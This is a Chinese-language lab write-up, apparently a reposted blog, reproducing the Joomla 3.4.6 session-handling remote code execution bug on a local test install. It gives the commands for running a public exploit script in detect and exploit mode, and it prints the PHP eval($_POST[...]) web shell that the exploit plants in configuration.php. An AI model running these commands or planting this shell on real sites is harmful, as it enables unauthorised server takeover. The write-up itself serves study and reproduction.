Joomla 3.4.6 遠程代碼執行漏洞復現分析


0x00 CMS簡介

Joomla!是一套全球知名的內容管理系統。 Joomla!是使用PHP語言加上MySQL數據庫所開發的軟件系統,目前最新版本是3.9.11 。可以在Linux、 Windows、MacOSX等各種不同的平台上執行。目前是由Open Source Matter這個開放源碼組織進行開發與支持,這個組織的成員來自全世界各地,小組成員約有150人,包含了開發者、設計者、系統管理者、文件撰寫者,以及超過2萬名的參與會員。
自2012年頒獎典禮開始以來,Joomla連續多年成為CMS評獎的冠軍。繼2015、2016、2017、2018年在全球CMS評測中,它再次獲得“最佳開源CMS”獎!

0x01 漏洞簡介

  • Alessandro Groppo @Hacktive Security於2019-10-02在exploit-db( https://www.exploit-db.com/exploits/47465)發布了Joomla命令執行的EXP,漏洞本質是Joomla對session數據處理不當,未經授權的攻擊者可以發送精心構造的惡意 HTTP 請求,獲取服務器權限,實現遠程命令執行。
  • 影響范圍:3.0.0 <= Joomla <= 3.4.6

0x02 環境搭建

我用的phpstudy搭建的
Joomla下載地址:https://downloads.joomla.org/it/cms/joomla3/3-4-6
安裝成功后首頁如下
在這里插入圖片描述

0x03 漏洞復現

EXP:https://github.com/kiks7/rusty_joomla_rce
1.漏洞檢測

python rusty_joomla_exploit.py -t http://quan.joomla346.net/ -c

運行結果如下,Vulnerable證明存在漏洞
在這里插入圖片描述
2.漏洞利用

rusty_joomla_rce-master>python rusty_joomla_exploit.py -t http://quan.joomla346.net/ -e -l quan.joomla346.net -p 80

在這里插入圖片描述
可以看到configuration.php中寫入了一句話木馬(這里我多運行了幾次,於是有好幾個)
在這里插入圖片描述

if(isset($_POST['epgijbodvzllittceoyidpbbglcdawduhyvqqtdndfxjfivvkg'])) eval($_POST['epgijbodvzllittceoyidpbbglcdawduhyvqqtdndfxjfivvkg']);if(isset($_POST['bhjhofjrtfrlskgaufapblryaqymfzrrbaoluyljwgekkoakhm'])) eval($_POST['bhjhofjrtfrlskgaufapblryaqymfzrrbaoluyljwgekkoakhm']);if(isset($_POST['dzyxxxhejymxvidysrisgguzvbehpuudwgkwcgldarnnlkxgbj'])) eval($_POST['dzyxxxhejymxvidysrisgguzvbehpuudwgkwcgldarnnlkxgbj']);

用菜刀連接
在這里插入圖片描述

0x04 漏洞修復

更新至官網最新版本

0x05 參考

https://mp.weixin.qq.com/s/1LJJG-whv1vUfaWDSfA2gg


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM